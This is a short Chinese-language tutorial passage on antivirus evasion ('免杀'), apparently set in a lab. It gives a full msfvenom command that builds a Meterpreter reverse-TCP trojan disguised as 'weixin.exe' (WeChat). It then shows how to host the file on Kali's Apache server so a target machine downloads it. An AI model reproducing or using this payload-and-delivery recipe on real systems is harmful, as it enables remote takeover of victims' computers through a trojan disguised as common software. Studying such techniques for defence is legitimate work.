免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。
意为不做任何免杀处理的木马
1、使用msf的msfvenom生成木马文件,生成一个裸奔马,命名为 weixin.exe吧
命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe
2、部署一下kali上的apache服务,令目标机器能够访问下载我们生成的木马
2.1、kali中是自带有apache的,启动apache服务
2.2、把生成的weixin.exe文件放在/var/www/html文件夹下
2.3、在靶机下访问192.168.111.132/weinxin.exe,已经下载
